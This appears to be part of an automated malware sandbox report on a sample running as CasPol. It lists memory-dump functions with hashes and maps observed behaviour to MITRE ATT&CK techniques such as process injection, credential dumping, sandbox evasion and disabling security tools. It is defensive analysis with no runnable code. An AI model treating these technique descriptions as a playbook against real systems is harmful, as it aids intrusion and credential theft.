Opcode ID: 0facb8f2a4f55febf382f8ba406c8fe9e9555981d2f27c06f79a961ecbe53f33
Instruction ID: f3663410b0b7bb07659b1915fb7a6c1cb9fb5b147b830410e1c95c4a5ff89c3a
Opcode Fuzzy Hash: 0facb8f2a4f55febf382f8ba406c8fe9e9555981d2f27c06f79a961ecbe53f33
Instruction Fuzzy Hash: E501377545D3C24FD3039FB4A9A4B543FB0AB23694F0A86E7C5C0CB0A3D668588A9723

Uniqueness

Uniqueness Score: -1.00%

Function 1D3605CF Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.775447019.000000001D360000.00000040.00000020.00020000.00000000.sdmp, Offset: 1D360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d360000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c114c1c3b76efa2e0428d7b371647c3ec5b2d4c2a9f6256987210b2df3e22c3b
Instruction ID: f183c716946e843fce914d9defdfa12a66c677e1d4115e31604da504dcb110a3
Opcode Fuzzy Hash: c114c1c3b76efa2e0428d7b371647c3ec5b2d4c2a9f6256987210b2df3e22c3b
Instruction Fuzzy Hash: 1FF0A9B65097806FD7118F06EC40862FFA8EF86630709C59FEC49DB612D265B908CB76

Uniqueness

Uniqueness Score: -1.00%

Function 200F8B38 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.785422401.00000000200F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 200F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_200f0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc3e436b00b900290c3d16e0ff4a8eadef633614df5a6f00ba4fbc64e09f65f3
Instruction ID: d9b6d407c9bf97dc4b8b6f20988369fbba262d22fc224bfaa0a871b74da6c5d7
Opcode Fuzzy Hash: cc3e436b00b900290c3d16e0ff4a8eadef633614df5a6f00ba4fbc64e09f65f3
Instruction Fuzzy Hash: FD018E30608324DFC701EF38C09A15D7BE1EF81204B41985DE18687361EA76EC08DB93

Uniqueness

Uniqueness Score: -1.00%

Function 200F2FC0 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.785422401.00000000200F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 200F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_200f0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3523942d8200993d41f7a9887585f320c3ab995f428a7c5b619a05725690b5e1
Instruction ID: 4d4ba54ff18c6064de9320889e53a43fe34d1ea455dd51c2335b8d8992f5abe0
Opcode Fuzzy Hash: 3523942d8200993d41f7a9887585f320c3ab995f428a7c5b619a05725690b5e1
Instruction Fuzzy Hash: BDF0F632B101189FD7109AB99C8469F77FDEB883A5F100135EA19D3240DE36AD41D7D1

Uniqueness

Uniqueness Score: -1.00%

Function 1D360639 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.775447019.000000001D360000.00000040.00000020.00020000.00000000.sdmp, Offset: 1D360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d360000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c458a48a2f372cbcb19b8e8e7e5a0f0d0fac28be926dc3a633576840679e2af
Instruction ID: b4cd216de06d329334d19aef3844f099f345f4dacc318e650da86b2ebbe1c8e5
Opcode Fuzzy Hash: 8c458a48a2f372cbcb19b8e8e7e5a0f0d0fac28be926dc3a633576840679e2af
Instruction Fuzzy Hash: AEF0E23264D7804FC3168B24BC53591BF70DB82230B1945FBC999CF257D61AA609C77B

Uniqueness

Uniqueness Score: -1.00%

Function 1D4C8770 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.775686354.000000001D4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D4C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d4c0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca264e416640f6ff1c6e88bedb00127e5eb60bc701464d0107d8945d00ab94c4
Instruction ID: d399dca10fe6dd63a8bda7257383bcc89c1557fd919322834cfe2c057ea80499
Opcode Fuzzy Hash: ca264e416640f6ff1c6e88bedb00127e5eb60bc701464d0107d8945d00ab94c4
Instruction Fuzzy Hash: 95F01D79E002199FCF40EBB9884869FBFF9EB88650B110469D518E3340EA345A018BE5

Uniqueness

Uniqueness Score: -1.00%

Function 1D4C4573 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.775686354.000000001D4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D4C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d4c0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 121dd6e6230d9fbbe8fff29b49733a39e4ec7a1c03c842db8e8765ccf4d0dee1
Instruction ID: 7c44aeea22a288ede0c0b27b24a80aaf1c9dbe54f87283b318ced5ca0ca9b33e
Opcode Fuzzy Hash: 121dd6e6230d9fbbe8fff29b49733a39e4ec7a1c03c842db8e8765ccf4d0dee1
Instruction Fuzzy Hash: 1F018378E052298FCBA1DB68C99469CBBF5BB48314F0081DAE41DA3711DB315E918F11

Uniqueness

Uniqueness Score: -1.00%

Function 1D3625C0 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.775447019.000000001D360000.00000040.00000020.00020000.00000000.sdmp, Offset: 1D360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d360000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b19c7617bfefa67c4dca9e604c28ecd46219a850cbae57fadd6fec45e57fbf
Instruction ID: 87cbd235db6e05f1a72da14eaccc9452833329f12a15d699ba755632463df907
Opcode Fuzzy Hash: 30b19c7617bfefa67c4dca9e604c28ecd46219a850cbae57fadd6fec45e57fbf
Instruction Fuzzy Hash: 1FF01D39104685DFC316CF00D590B15FBA2FB89718F24C6ADEA480B756C737D913DA91

Uniqueness

Uniqueness Score: -1.00%

Function 1D3605F6 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.775447019.000000001D360000.00000040.00000020.00020000.00000000.sdmp, Offset: 1D360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d360000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25722b412e5c74d7c4f5b614857b4e27da59eab75a01885631056d50977b7743
Instruction ID: b94a98af00b9eb78ee8f1bf7d32a4d9aa83dcceb80bf3579846890de5f67efe2
Opcode Fuzzy Hash: 25722b412e5c74d7c4f5b614857b4e27da59eab75a01885631056d50977b7743
Instruction Fuzzy Hash: E0E06DB66006004B9650CF0AED41452F7D4EB84630B08C06BDC0D8B711D27AB5048AB6

Uniqueness

Uniqueness Score: -1.00%

Function 1D4C45CA Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.775686354.000000001D4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D4C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d4c0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bf3f27985a78ff6548e5c39686fcb8c121900683841f17e0af570ac5d3b3b75
Instruction ID: 998975461b0e0144a68e26ba53642a1b284da466b086b6b8669cf920d5bbe4fd
Opcode Fuzzy Hash: 1bf3f27985a78ff6548e5c39686fcb8c121900683841f17e0af570ac5d3b3b75
Instruction Fuzzy Hash: 71F0CF38E002288BCFA1DB68C99069CB7F5AB48314F0081EAE41DA3200DA319E908F11

Uniqueness

Uniqueness Score: -1.00%

Function 00EE3B6F Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.762529365.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ee0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddb9c20b94dab2124ae294ed6ae12709cb2e37eae37f04b45bc412e8d69de3a1
Instruction ID: f888b8eea1d26829d72a079f9e3fe118705358c6a458e80c49f3de305a978b54
Opcode Fuzzy Hash: ddb9c20b94dab2124ae294ed6ae12709cb2e37eae37f04b45bc412e8d69de3a1
Instruction Fuzzy Hash: 62E0D8B2A403006BD2108F0AAD41F22FB98EB84A30F04C567ED085F742D176B61489F5

Uniqueness

Uniqueness Score: -1.00%

Function 00EE3107 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.762529365.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ee0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 376c26ca00f6892bb34fdcd1ed8fb7c607ae93fd6e94fdfc26f77e9e4c60bd2b
Instruction ID: b9f72a3c643a3ee5cbb7f9044740d5f6da930d8faaa4311f70fd2d077108da42
Opcode Fuzzy Hash: 376c26ca00f6892bb34fdcd1ed8fb7c607ae93fd6e94fdfc26f77e9e4c60bd2b
Instruction Fuzzy Hash: A7E0D8B2A003006BD2108F0AAD41B22FB98EB80A30F04C557ED085F742D176B61489F1

Uniqueness

Uniqueness Score: -1.00%

Function 200F9A27 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.785422401.00000000200F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 200F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_200f0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c9ab63c5b7a76359cbcafef35785e37a1eb4fcdd80ac9b5ccfe5da6512ef0c2
Instruction ID: 5abd83c1d10647e0e47909d04b9f280dc2d5d3ca7784b5cfe8e97e6e4a122646
Opcode Fuzzy Hash: 9c9ab63c5b7a76359cbcafef35785e37a1eb4fcdd80ac9b5ccfe5da6512ef0c2
Instruction Fuzzy Hash: 56E06D39F004058BCF01E7B8D4848ADB3F1AF88224710C066D509E7360EE35ED068752

Uniqueness

Uniqueness Score: -1.00%

Function 200FDE4F Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.785422401.00000000200F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 200F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_200f0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 987efe6e97b5a6981a9e0358fda0f85335a6bf86547b54e34fd5614ae10bb20e
Instruction ID: 4be7d355d928cbd80b0a61f57b87f22663f7afbf820d196144ca2cca1e9c54aa
Opcode Fuzzy Hash: 987efe6e97b5a6981a9e0358fda0f85335a6bf86547b54e34fd5614ae10bb20e
Instruction Fuzzy Hash: D8E0ED39F004158BCF01E7B8D5848ADB3F1AB88225720C06AD519E7354DE39ED158751

Uniqueness

Uniqueness Score: -1.00%

Function 200F545F Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.785422401.00000000200F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 200F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_200f0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ebc2f87e786321d78f5bce63903ae5e1a08b17cd6f23713c230f6ee0b064e04
Instruction ID: 93dab516173c288a278bd82ab014a5114a345e025b421ac5ccbac1c6a0628624
Opcode Fuzzy Hash: 0ebc2f87e786321d78f5bce63903ae5e1a08b17cd6f23713c230f6ee0b064e04
Instruction Fuzzy Hash: EAE0ED39F045158BCF01E7B8D4848ADB3F1AF882257208065D519E7310DE39ED55C761

Uniqueness

Uniqueness Score: -1.00%

Function 200F465F Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.785422401.00000000200F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 200F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_200f0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b82ce3edc3ff9cc3e9b250fd63b313f22027d4563699745f30b4fe1ff96d597
Instruction ID: b38ffe46eb67d0141cb5a407beb9b60d0d00ff1d42592c33817747daa32560fe
Opcode Fuzzy Hash: 5b82ce3edc3ff9cc3e9b250fd63b313f22027d4563699745f30b4fe1ff96d597
Instruction Fuzzy Hash: 30E0ED39F004148BCF01E7B8D5948ADB3F1AF882257108069D519E7360DE39ED158B51

Uniqueness

Uniqueness Score: -1.00%

Function 200F38C7 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.785422401.00000000200F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 200F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_200f0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef5d9c5fd4e0f190dca95745a9c8d6b1666dea22ad8ce1f9374389064d1a0db4
Instruction ID: 4340fc32f7118d1653d47655413d8850d11d77b95c0770ff65ef437b946facf3
Opcode Fuzzy Hash: ef5d9c5fd4e0f190dca95745a9c8d6b1666dea22ad8ce1f9374389064d1a0db4
Instruction Fuzzy Hash: AFE06D39F004058BCF01EBB8D4948ADB3F1AF88225710C065D519E7324DE39ED068711

Uniqueness

Uniqueness Score: -1.00%

Function 200F6CDF Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.785422401.00000000200F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 200F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_200f0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebc23ad2aee90060e6a5f4a125cc3a442ba44c536c0231ac32e3b4ea6299759c
Instruction ID: 6e6c17998b498a3b5a8dd715afaa65843aa1cb021391c7eaa4dd8cb5bcd60e15
Opcode Fuzzy Hash: ebc23ad2aee90060e6a5f4a125cc3a442ba44c536c0231ac32e3b4ea6299759c
Instruction Fuzzy Hash: 8EE0E539F004148BCF01EBB8D5859ADB3F1AF8822572080A9D519E7360EE39ED168B62

Uniqueness

Uniqueness Score: -1.00%

Function 200F533F Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.785422401.00000000200F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 200F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_200f0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ad7b09956523689d36c5c126e5566a75a1e64a348a6cb1b1ad6e44b32efcdb8
Instruction ID: 1d25fbcef89324375ef9c3d56373856da6172318f50d9ba13973999ef021d88a
Opcode Fuzzy Hash: 8ad7b09956523689d36c5c126e5566a75a1e64a348a6cb1b1ad6e44b32efcdb8
Instruction Fuzzy Hash: A7E01239F004148BCF05E7B8D5848EDB3F1AF88225710C4A5D519E7310EE35ED15C761

Uniqueness

Uniqueness Score: -1.00%

Function 200F678F Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.785422401.00000000200F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 200F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_200f0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a90ed468809fcc95e2fa145c34367b8886c39668f93e764d73cf5e242b083b2c
Instruction ID: f5fd959653b39872129402a5f71a6407e409145054b9bb452c9929e4574acd77
Opcode Fuzzy Hash: a90ed468809fcc95e2fa145c34367b8886c39668f93e764d73cf5e242b083b2c
Instruction Fuzzy Hash: 46E01239F045148BCF01E7F8D5948EDB3F1AF8822972080A9D519E7314DE35ED15C761

Uniqueness

Uniqueness Score: -1.00%

Function 200F6BBF Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.785422401.00000000200F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 200F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_200f0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b90a8c3e8b3de33315aefa133a8a09a163d2feefd3d2b01ee340f9c13fe8654a
Instruction ID: ca4569486dc1e3c2645d1e2a1804d0fa48024045180f5f51dc19024276e110ad
Opcode Fuzzy Hash: b90a8c3e8b3de33315aefa133a8a09a163d2feefd3d2b01ee340f9c13fe8654a
Instruction Fuzzy Hash: 7AE0ED39F005158BCF01E7B8D5848ADB3F1AB88225B108069D519E7351DE39ED558751

Uniqueness

Uniqueness Score: -1.00%

Function 1D4C86AF Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.775686354.000000001D4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D4C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d4c0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 572aa3d60ae5102e3a2dc084c01d7e6fd657b15cb4bb1afb4d39ee30ff7f0cf0
Instruction ID: 8a141ef670593c7f928a6845a053dc589c5cb50c9690370a118c2231d37668b1
Opcode Fuzzy Hash: 572aa3d60ae5102e3a2dc084c01d7e6fd657b15cb4bb1afb4d39ee30ff7f0cf0
Instruction Fuzzy Hash: 4DE0ED3AF104148BCF01E7B8D5844ADB3F1AF8822571081A9D519E7350EE35ED158B61

Uniqueness

Uniqueness Score: -1.00%

Function 1D4C68A1 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.775686354.000000001D4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D4C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d4c0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efff2b2d881a87a4bf99421fe050494c1c19546d4a77b10820ae7b1586eb4a18
Instruction ID: 5ea38a9d17bd69d2a8f5fe330086d227bd9e71942672f8024b81f92e67a3f09b
Opcode Fuzzy Hash: efff2b2d881a87a4bf99421fe050494c1c19546d4a77b10820ae7b1586eb4a18
Instruction Fuzzy Hash: 6FE0AC39B00114CFCF41EBA8D59849DB7F5BB8826571081A9D429E3355EB36AD118B61

Uniqueness

Uniqueness Score: -1.00%

Function 1D2A23F4 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.774878555.000000001D2A2000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d2a2000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74c3aa8f15981ec4798eacd304c5a2ba7ff5d618a85288bcfdf0b0922818f9a2
Instruction ID: e8741ab0cf3230242ca0d65942d7c3d1811124e30f81696aff25694dd9b84634
Opcode Fuzzy Hash: 74c3aa8f15981ec4798eacd304c5a2ba7ff5d618a85288bcfdf0b0922818f9a2
Instruction Fuzzy Hash: CAD05E79645AA34FD3128A1CC1A0FA53B94EF53B04F5684F9A8408BA63C768E585D201

Uniqueness

Uniqueness Score: -1.00%

Function 1D2A23BC Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.774878555.000000001D2A2000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d2a2000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5feccd0066f70a3c1b48093c4ddf1f6814231408ec62b5e21117a704ff48b10
Instruction ID: 2e7cf3cbd6a211d66f9a6d146a664fe8739d34722b01f49e283fbb3a195d72fe
Opcode Fuzzy Hash: f5feccd0066f70a3c1b48093c4ddf1f6814231408ec62b5e21117a704ff48b10
Instruction Fuzzy Hash: 3AD017346402824FCB01DA18C2D0F6937D4EF42B00F1254A8AC118B6A2C7A8E881CA01

Uniqueness

Uniqueness Score: -1.00%

Function 1D4C0070 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.775686354.000000001D4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D4C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d4c0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97ae8e950acff1ab0337c73db4d2a40cdad7d15c72e81820dfea6eb59263fb24
Instruction ID: b065b34f7871da89ffb16e66bfefdaa9ca9a7523b88f8a2cb630c23a12e5c3df
Opcode Fuzzy Hash: 97ae8e950acff1ab0337c73db4d2a40cdad7d15c72e81820dfea6eb59263fb24
Instruction Fuzzy Hash: 55B0123259820B47C5143FE4D45C53973BCAFE4E0CF000433D509016851E49B8815062

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 1D4C6BE0 Relevance: 16.7, Strings: 12, Instructions: 1672COMMON

Download Yara Rule

Strings

X1Kr, xrefs: 1D4C7B49
X1Kr, xrefs: 1D4C7EE4
X1Kr, xrefs: 1D4C7CE1
X1Kr, xrefs: 1D4C8002
X1Kr, xrefs: 1D4C7F7F
X1Kr, xrefs: 1D4C7B11
X1Kr, xrefs: 1D4C7EBA
X1Kr, xrefs: 1D4C7D18
X1Kr, xrefs: 1D4C7F50
X1Kr, xrefs: 1D4C7D3E
X1Kr, xrefs: 1D4C7CC2
X1Kr, xrefs: 1D4C7BB5

Memory Dump Source

Source File: 00000011.00000002.775686354.000000001D4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D4C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d4c0000_CasPol.jbxd

Similarity

API ID:
String ID: X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr
API String ID: 0-2244375908
Opcode ID: 6f8e40f82c59273eee6a2b0817d3bed36523074d86db69c7d047fdd1f36aaa16
Instruction ID: dbfafb77fbcddc0fade45d884987dd5ec835065811fb22d4c7ce36c408317353
Opcode Fuzzy Hash: 6f8e40f82c59273eee6a2b0817d3bed36523074d86db69c7d047fdd1f36aaa16
Instruction Fuzzy Hash: ADE22838A00215CFDB14DB78C588BADBBF2BF89314F2584A9D51A9B351DB35EC81CB52

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
